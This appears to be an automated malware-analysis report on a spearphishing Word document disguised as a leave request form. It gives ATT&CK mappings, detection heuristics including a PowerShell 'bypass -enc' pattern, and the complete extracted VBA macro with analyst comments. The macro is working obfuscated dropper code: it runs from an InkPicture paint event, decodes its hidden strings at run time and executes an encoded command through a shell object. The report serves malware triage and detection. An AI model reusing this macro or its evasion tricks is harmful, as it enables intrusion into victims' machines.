MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing VBA macros. The macros are obfuscated but contain references to PowerShell and a specific command line argument pattern ('powershell -ep bypass -enc'). This suggests the macro's intent is to download and execute a second-stage payload using PowerShell. Note that in the extracted macro source every string literal is stored in an encoded form (base64 followed by a custom 32-bit bit permutation, decoded at run time by B8NpRatnPW), so the automation ProgID, the executed command line and the document-property name are not readable in the listing below and must be recovered by running or porting the decoder. Two further details matter for triage: execution is triggered from an InkPicture control's Painted event rather than AutoOpen/Document_Open, and the value of a built-in document property is piped into the spawned process's standard input, so the document metadata should be extracted alongside the macro when collecting indicators. The document itself presents a plausible lure (a leave request form) to encourage the user to open it, aligning with a spearphishing attachment attack vector.
Heuristics 6
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROS Document contains VBA macro code (no AutoExec-keyword finding is listed: the macro's entry point is the InkPicture1_Painted control event rather than AutoOpen/Document_Open, see the extracted script below).
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
dTuLH2jaP = ActiveDocument.BuiltInDocumentProperties(B8NpRatnPW("w" & Chr(Int("76")) & Chr(Int("108")) & Chr(Int("119")) & Chr(87) & Chr(101) & Chr(Int("114")) & Chr(Int("54")) & Chr(&H66) & Chr(Int("49")) & Chr(119) & Chr(Int("61")))) Set o7dEZL = CreateObject(B8NpRatnPW("i" & Chr(Int("&H76")) & Chr(Int("&H50")) & "l" & "U" & "u" & Chr(67) & Chr(52) & "d" & Chr(Int("&H68")) & Chr(Int("&H7a")) & Chr(&H53) & Chr(-158 + 271) & Chr(Int("80")) & Chr(1830 - 1764) & Chr(212628 / 2444) & Chr(43) & Chr(80) & Chr(Int("112")) & Chr(&H66) & "X" & Chr(Int("81")) & Chr(Int("61")) & Chr(92964 / 1524))) With o7dEZL.Exec(B8NpRatnPW("uK3RX6K1WVa4LlpV4CVSF7KjUxngk/9VuO/VWbC/WFawgNhUqKtYEeiP61Soq3pU+MlcTQ==")) -
Embedded URL info EMBEDDED_URL One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace present in ordinary Office files and is not an indicator on its own.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6188 bytes |
SHA-256: dde0ff247460fb963c3f82bfd2301dfcb4dc03e6a8a718b70a5fdae772060c90 |
|||
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Paint-event guard. VBA zero-initialises it on load; InkPicture1_Painted
' increments it so that CBiXzh5LXQx runs only on the control's first paint.
Public Once As Integer
' Main payload routine. Invoked once from InkPicture1_Painted (there is no
' AutoOpen / Document_Open in this module). Every string it uses is stored
' encoded - the argument expressions assemble base64 text out of Chr()
' arithmetic - and decoded at run time by B8NpRatnPW, so the shape names,
' the property name, the ProgID and the command line are not readable in
' this listing; run or port the decoder (base64 -> ssYC bit permutation ->
' strip "~") on each literal to recover them.
Public Sub CBiXzh5LXQx()
    ' All errors are swallowed: a failed CreateObject or Exec leaves no trace.
    On Error Resume Next
    ' Remove two named shapes from the document without saving - presumably
    ' the visual lure overlay; the decoded names are needed to confirm.
    xQJsGlviy B8NpRatnPW(Chr(54) & Chr(113) & Chr(Int("&H4e")) & Chr(Int("48")) & Chr(88) & Chr(Int("118")) & Chr(&H69) & "s" & Chr(Int("56")) & Chr(1007 - 887) & "X" & Chr(92 - 40) & Chr(Int("54")) & Chr(49) & Chr(&H52) & Chr(&H63)), False
    xQJsGlviy B8NpRatnPW(Chr(Int("&H6d")) & Chr(117) & "l" & Chr(&H35) & "V" & Chr(98) & Chr(Int("&H4b")) & Chr(1062 - 950) & Chr(Int("87")) & Chr(82) & Chr(170720 / 2134) & Chr(Int("54")) & Chr(128850 / 2577) & Chr(70) & Chr(&H31) & Chr(&H66)), False
    Dim dTuLH2jaP As String
    ' The data later written to the child process comes from a built-in
    ' document property (name decoded at run time), i.e. part of the payload
    ' is stashed in document metadata rather than in the macro text. Extract
    ' that property value as well when pulling indicators from this sample.
    dTuLH2jaP = ActiveDocument.BuiltInDocumentProperties(B8NpRatnPW("w" & Chr(Int("76")) & Chr(Int("108")) & Chr(Int("119")) & Chr(87) & Chr(101) & Chr(Int("114")) & Chr(Int("54")) & Chr(&H66) & Chr(Int("49")) & Chr(119) & Chr(Int("61"))))
    ' Late-bound automation object from a decoded ProgID (o7dEZL is not
    ' declared, so it is a Variant). The members used below - .Exec returning
    ' an object with .StdIn and .Terminate - match WScript.Shell /
    ' WshScriptExec; confirm from the decoded ProgID.
    Set o7dEZL = CreateObject(B8NpRatnPW("i" & Chr(Int("&H76")) & Chr(Int("&H50")) & "l" & "U" & "u" & Chr(67) & Chr(52) & "d" & Chr(Int("&H68")) & Chr(Int("&H7a")) & Chr(&H53) & Chr(-158 + 271) & Chr(Int("80")) & Chr(1830 - 1764) & Chr(212628 / 2444) & Chr(43) & Chr(80) & Chr(Int("112")) & Chr(&H66) & "X" & Chr(Int("81")) & Chr(Int("61")) & Chr(92964 / 1524)))
    ' Spawn the decoded command line, pipe the property value into its
    ' standard input, then terminate the launched process. The command text
    ' is only the base64 blob here; what it runs and whether it reads stdin
    ' can only be told after decoding.
    With o7dEZL.Exec(B8NpRatnPW("uK3RX6K1WVa4LlpV4CVSF7KjUxngk/9VuO/VWbC/WFawgNhUqKtYEeiP61Soq3pU+MlcTQ=="))
        .StdIn.WriteLine dTuLH2jaP
        ' NOTE(review): TextStream exposes WriteBlankLines (plural); if this
        ' singular name is a typo the call fails silently under Resume Next.
        .StdIn.WriteBlankLine 1
        .Terminate
    End With
End Sub
' Delete the first shape in the active document whose Name equals a7zCi2T,
' optionally saving the document afterwards. CBiXzh5LXQx calls it with
' decoded names and mBsBfRnZ = False, so the file on disk is not rewritten.
'   a7zCi2T  - shape name to remove; exact match via StrComp with the
'              default compare mode (binary/case-sensitive unless an
'              Option Compare Text line exists above this listing)
'   mBsBfRnZ - when True, ActiveDocument.Save is called after the deletion
Private Sub xQJsGlviy(ByVal a7zCi2T As String, ByVal mBsBfRnZ As Boolean)
    Dim mONQEAy As Word.Shape
    ' A missing shape or failed delete is silently ignored.
    On Error Resume Next
    For Each mONQEAy In ActiveDocument.Shapes
        If StrComp(mONQEAy.Name, a7zCi2T) = 0 Then
            mONQEAy.Delete
            ' Only the first matching shape is removed.
            Exit For
        End If
    Next
    If mBsBfRnZ Then
        ActiveDocument.Save
    End If
End Sub
' Entry point of the macro. Painted event handler of an InkPicture ActiveX
' control (Microsoft Ink, MSINKAUTLib) that is presumably embedded in the
' document; the event fires when the control is drawn, i.e. when the
' document is displayed, which lets the payload run without any
' AutoOpen / Document_Open procedure. The module-level Once counter limits
' execution to the first paint. The event parameters are unused.
Private Sub InkPicture1_Painted(ByVal Utb7Vp As Long, ByVal fn9j2GM As MSINKAUTLib.IInkRectangle)
    If Once < 1 Then
        CBiXzh5LXQx
    End If
    Once = Once + 1
End Sub
' Logical (unsigned) right shift of a 32-bit Long by yRCTh bits, emulated
' with division because VBA has no shift operator.
'   positive input : Int(x / 2^n); n > 31 also yields 0 through the division
'   negative input : clear the sign bit, shift, then re-insert the old sign
'                    bit at position 31-n; n > 31 returns 0
'   yRCTh = 0      : input returned unchanged
' NOTE(review): an input of 0 fails the "> 0" test and takes the negative
' branch, so nwQFcIIlZM(0, n) = 2^(31-n) rather than 0 for 1 <= n <= 31.
' A port that uses a true >> will diverge on zero words; the decoded
' strings are padded with "~" instead of NUL, so this case may never be
' hit in practice - confirm when re-implementing the decoder.
Public Function nwQFcIIlZM(ByVal RpjUrGTE9SM As Long, ByVal yRCTh As Byte) As Long
    nwQFcIIlZM = RpjUrGTE9SM
    If yRCTh > 0 Then
        If RpjUrGTE9SM > 0 Then
            ' Non-negative: plain division, Int() floors the Double result.
            nwQFcIIlZM = Int(nwQFcIIlZM / (2 ^ yRCTh))
        Else
            If yRCTh > 31 Then
                nwQFcIIlZM = 0
            Else
                ' Drop the sign bit so the division behaves like an
                ' unsigned shift, then put that bit back at 31-n.
                nwQFcIIlZM = nwQFcIIlZM And &H7FFFFFFF
                nwQFcIIlZM = Int(nwQFcIIlZM / (2 ^ yRCTh))
                nwQFcIIlZM = nwQFcIIlZM Or 2 ^ (31 - yRCTh)
            End If
        End If
    End If
End Function
' Left shift of a 32-bit Long by yRCTh bits, one bit per loop iteration,
' emulated with multiplication. Each step saves bit 30, clears bits 30-31,
' doubles the value (bits 0-29 move to 1-30) and, if bit 30 was set, sets
' bit 31 with Or &H80000000; the old bit 31 is discarded, matching a
' C-style << on an unsigned 32-bit word. yRCTh = 0 returns the input.
Public Function nR2MqWNdsR8e(ByVal RpjUrGTE9SM As Long, ByVal yRCTh As Byte) As Long
    nR2MqWNdsR8e = RpjUrGTE9SM
    If yRCTh > 0 Then
        Dim i As Byte
        Dim m As Long
        For i = 1 To yRCTh
            ' m <> 0 when bit 30 is set; it becomes bit 31 after the doubling.
            m = nR2MqWNdsR8e And &H40000000
            ' Masking off bits 30-31 first keeps the multiplication from
            ' overflowing a signed Long.
            nR2MqWNdsR8e = (nR2MqWNdsR8e And &H3FFFFFFF) * 2
            If m <> 0 Then
                nR2MqWNdsR8e = nR2MqWNdsR8e Or &H80000000
            End If
        Next i
    End If
End Function
' Two-round "delta swap" bit permutation of a 32-bit word. Each round does
'   t = (x Xor (x >> d)) And mask
'   x = x Xor t Xor (t << d)
' which swaps bit i with bit i+d for every bit i set in mask. Round 1 uses
' d = 14 with mask 52428 (&HCCCC); round 2 uses d = 7 with mask 5570645
' (&H550055). A delta swap is its own inverse, so the encoder applied the
' same two swaps in the opposite order. Correctness relies on nwQFcIIlZM /
' nR2MqWNdsR8e acting as logical shifts (see the zero-input note on
' nwQFcIIlZM).
' Note: "Dim t As Long, u, out As Long" types only t and out as Long;
' u is a Variant.
Public Function ssYC(ByVal SD0johicbIO As Long) As Long
    Const J9PAcpZKp As Long = 5570645
    Const JnfcIhP0joM As Long = 52428
    Const d1 = 7
    Const d2 = 14
    Dim t As Long, u, out As Long
    ' Round 1: distance 14, mask &HCCCC.
    t = (SD0johicbIO Xor nwQFcIIlZM(SD0johicbIO, d2)) And JnfcIhP0joM
    u = SD0johicbIO Xor t Xor nR2MqWNdsR8e(t, d2)
    ' Round 2: distance 7, mask &H550055.
    t = (u Xor nwQFcIIlZM(u, d1)) And J9PAcpZKp
    out = (u Xor t Xor nR2MqWNdsR8e(t, d1))
    ssYC = out
End Function
' Second decoding stage. Takes the bytes produced by the base64 step,
' treats every 4 bytes as a little-endian 32-bit word, runs the word
' through the ssYC bit permutation and appends the permuted word's bytes
' back in little-endian order, returning the result as a String.
'   Zjums8 - byte array whose length is expected to be a multiple of 4;
'            a trailing partial group would index past UBound and raise a
'            run-time error (there is no On Error here) - confirm that the
'            encoder always pads (the "~" suffix stripped later suggests so)
' Note: "Dim i, fr, uttNBkaZX, raw As Long" types only raw as Long; the
' others are Variants. ZJ3IRhK, a2 and b2 are declared but never used.
Public Function C21yxJmOCo(ByRef Zjums8() As Byte) As String
    Dim i, fr, uttNBkaZX, raw As Long
    Dim a As String, b As String, c As String, d As String
    Dim nOkju4 As String
    Dim ZJ3IRhK() As String
    Dim a2, b2 As String
    nOkju4 = ""
    ' The loop bound overshoots; the Exit For below stops at the real end.
    For i = 0 To (UBound(Zjums8) / 4 + 1)
        fr = i * 4
        If fr > UBound(Zjums8) Then
            Exit For
        End If
        ' Assemble the word little-endian: byte 3 is the most significant.
        uttNBkaZX = 0
        uttNBkaZX = uttNBkaZX Or nR2MqWNdsR8e(Zjums8(fr + 3), 24)
        uttNBkaZX = uttNBkaZX Or nR2MqWNdsR8e(Zjums8(fr + 2), 16)
        uttNBkaZX = uttNBkaZX Or nR2MqWNdsR8e(Zjums8(fr + 1), 8)
        uttNBkaZX = uttNBkaZX Or Zjums8(fr + 0)
        raw = ssYC(uttNBkaZX)
        ' Split the permuted word into bytes (a = bits 24-31 ... d = bits 0-7).
        a = Chr(nwQFcIIlZM((raw And &HFF000000), 24))
        b = Chr(nwQFcIIlZM((raw And 16711680), 16))
        c = Chr(nwQFcIIlZM((raw And 65280), 8))
        d = Chr(nwQFcIIlZM((raw And 255), 0))
        ' Emit low byte first, i.e. little-endian again.
        nOkju4 = nOkju4 + d + c + b + a
    Next i
    C21yxJmOCo = nOkju4
End Function
' String decoder used for every literal in this module. Pipeline:
'   1. strip CR/LF
'   2. standard base64 decode (A-Z a-z 0-9 + /) with a hand-built table
'   3. drop the output bytes that correspond to "=" padding
'   4. descramble 32-bit words with C21yxJmOCo / ssYC
'   5. strip trailing "~" padding characters via nJ9MGKli4gMx
' This is the routine to port, or to call from a harness, in order to
' recover the shape names, property name, ProgID and command line that
' CBiXzh5LXQx uses.
' Note: Zjums8 is passed ByRef (VBA default), so the Replace calls modify
' the caller's variable; every call site in this module passes an
' expression, so nothing observable is changed.
Public Function B8NpRatnPW(Zjums8 As String) As String
    Dim mUXRavPCb() As Byte, mLpOReLBL() As Byte, arrayByte3(255) As Byte
    Dim ZFo4jlRIB(63) As Long, arrayLong5(63) As Long
    Dim zx5Wr(63) As Long, fcbgWKZ1oB99 As Long
    Dim RJ2okJ1Y As Integer, iter As Long, syVL5HPeB As Long, c0HC0 As Long
    Dim nOkju4 As String
    Zjums8 = Replace(Zjums8, vbCr, vbNullString)
    Zjums8 = Replace(Zjums8, vbLf, vbNullString)
    ' Computed but immediately overwritten by the loop below; unused.
    c0HC0 = Len(Zjums8) Mod 4
    ' Number of "=" padding characters. InStrRev matches "==" anywhere in
    ' the input, not only at the end.
    If InStrRev(Zjums8, "==") Then
        RJ2okJ1Y = 2
    ElseIf InStrRev(Zjums8, "" + "=") Then
        RJ2okJ1Y = 1
    End If
    ' Standard base64 alphabet -> 6-bit value. Any character without a
    ' case here, including "=", decodes as 0.
    For c0HC0 = 0 To 255
        Select Case c0HC0
            Case 65 To 90
                arrayByte3(c0HC0) = c0HC0 - 65
            Case 97 To 122
                arrayByte3(c0HC0) = c0HC0 - 71
            Case 48 To 57
                arrayByte3(c0HC0) = c0HC0 + 4
            Case 43
                arrayByte3(c0HC0) = 62
            Case 47
                arrayByte3(c0HC0) = 63
        End Select
    Next c0HC0
    ' Multiplier tables standing in for << 6, << 12 and << 18.
    For c0HC0 = 0 To 63
        ZFo4jlRIB(c0HC0) = c0HC0 * 64
        arrayLong5(c0HC0) = c0HC0 * 4096
        zx5Wr(c0HC0) = c0HC0 * 262144
    Next c0HC0
    ' Input text as ANSI bytes; 3 output bytes per 4 input characters.
    mLpOReLBL = StrConv(Zjums8, vbFromUnicode)
    ReDim mUXRavPCb((((UBound(mLpOReLBL) + 1) \ 4) * 3) - 1)
    For iter = 0 To UBound(mLpOReLBL) Step 4
        ' Pack four 6-bit values into 24 bits, then unpack three bytes.
        fcbgWKZ1oB99 = zx5Wr(arrayByte3(mLpOReLBL(iter))) + arrayLong5(arrayByte3(mLpOReLBL(iter + 1))) + ZFo4jlRIB(arrayByte3(mLpOReLBL(iter + 2))) + arrayByte3(mLpOReLBL(iter + 3))
        c0HC0 = fcbgWKZ1oB99 And 16711680
        mUXRavPCb(syVL5HPeB) = c0HC0 \ 65536
        c0HC0 = fcbgWKZ1oB99 And 65280
        mUXRavPCb(syVL5HPeB + 1) = c0HC0 \ 256
        mUXRavPCb(syVL5HPeB + 2) = fcbgWKZ1oB99 And 255
        syVL5HPeB = syVL5HPeB + 3
    Next iter
    nOkju4 = StrConv(mUXRavPCb, vbUnicode)
    ' Remove the bytes produced by the "=" padding.
    If RJ2okJ1Y Then nOkju4 = Left$(nOkju4, Len(nOkju4) - RJ2okJ1Y)
    ' Stage 4: per-word bit permutation.
    B8NpRatnPW = C21yxJmOCo(StrConv(nOkju4, vbFromUnicode))
    ' Stage 5: strip the "~" padding appended by the encoder.
    B8NpRatnPW = nJ9MGKli4gMx(B8NpRatnPW, "~")
End Function
' Remove trailing padding: counts how many bcOAJH84g delimiters occur in
' t6wehw (UBound of Split) and chops that many characters off the end.
' Called with "~" after the bit-permutation stage, so a string padded with
' N trailing "~" loses exactly those N characters - but any "~" inside the
' payload is counted as well, in which case the truncation would eat real
' characters. t6wehw is ByRef and is modified in place as well as returned.
'   t6wehw     - decoded string, possibly padded
'   bcOAJH84g  - padding/delimiter character
Function nJ9MGKli4gMx(t6wehw As String, bcOAJH84g As String) As String
    Dim G7FZOT6z As Long
    Dim hyfhjz8G6Tg() As String
    hyfhjz8G6Tg = Split(t6wehw, bcOAJH84g)
    ' Number of delimiters = number of Split parts minus one.
    G7FZOT6z = UBound(hyfhjz8G6Tg, 1)
    If G7FZOT6z <> 0 Then
        t6wehw = Left$(t6wehw, Len(t6wehw) - G7FZOT6z)
    End If
    nJ9MGKli4gMx = t6wehw
End Function
|
|||